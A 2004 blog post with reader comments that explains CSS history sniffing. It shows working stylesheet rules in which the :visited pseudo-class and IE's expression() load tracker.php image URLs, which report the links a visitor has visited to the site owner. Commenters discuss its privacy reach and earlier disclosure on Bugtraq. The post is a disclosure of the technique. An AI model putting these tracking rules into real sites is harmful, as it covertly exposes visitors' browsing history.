milov.nl

Interaction design • webdevelopment • web art • photography

May 2004

using :visited and expression() to detect any visited link

There's been some talk (see Anne, CollyLogic) about it being possible to use the :visited pseudo-class and background-image urls to detect if a user has visited a particular link.

Luckily for Internet Explorer users, they are unaffected because IE doesn't support the [href=] selector. Unfortunately, there's another method that does work in IE and is even more dangerous...

The original (non-IE compatible) idea is to include a bunch of rules like these in the stylesheet:
a[href="http://slashdot.org/"]:visited {
  background-image: url(tracker.php?url=slashdot.org);
}

a[href="http://metafilter.com/"]:visited {
  background-image: url(tracker.php?url=metafilter.com);
}
(tracker.php being some server-side script that logs the url and ip-address, enabling the site owner to see which of his visitors have visited slashdot.org or metafilter.com.) The code below however, not only works in Internet Explorer but because it uses the special IE-only expression() property to dynamically append the href to the fake image url, it can be used to track all visited links, foregoing the need to specify a separate rule for each link:
a:visited {
  background-image:
  expression('url(tracker.php?url='+this.href+')');
}


Thiemo wrote on 2004/05/26:
What's so dangerous about this? You can do the same since HTML 1.0:

<a href="tracker.php?url=slashdot.org">


P01 wrote on 2004/05/26:
It's possible too extract all the URLs of the HTML markup to create the corresponding CSS rules for the standard compliant browsers, and finally throw the HTML + the extra CSS rules to the client.

Indeed, if the tracker.php script goes recursively through the pages visited by the user it can reveal some really valuable infos ( imagine the extra incomes an ad system could ask if it implements that sort of sniffer ) and eventually set a breach for the sites using an authentication via the parameters sent in GET ( which is whatever, a security no-no ).

The violation of privacy could reach an higher scale if the spamming companies used that exploit ( if don't already do ) in their mails.


milov wrote on 2004/05/26:
Thiemo, the big difference is is that with this technique, the visitor doesn't *click* on a link at all. Simply loading a page of links is enough to alert the site owner of which of those links the current visitor has visited before.


Jan! wrote on 2004/05/26:
Also, if you're serving dynamic pages anyway, you can just as well add an id attribute to every link, and style it in CSS with: #link857456 { background: url(tracker.php?id=link857456) }

Apart from that, I don't get why everyone's upset all of a sudden when this has been known (and applied) for years.


Thiemo wrote on 2004/05/26:
If a particular URL is in my browsers history or not does not mean anything. (What's important here: You can't read the history. Instead, you have to know the URL first!) Turn off your internet connection if you are afraid of being tracked.


milov wrote on 2004/05/26:
Jan!: You're right, with a dynamic site this whole expression() trick isn't really needed. And I wouldn't say I'm 'upset' or worried, just disappointed I didn't discover this cool (and indeed rather obvious) trick earlier ;)


Andrew Clover wrote on 2004/05/27:
Indeed known about for some time. I mentioned this issue in a post to Bugtraq a few years ago:

http://www.doxdesk.com/personal/posts/bugtraq/20020214-css.html

There is no obvious good solution.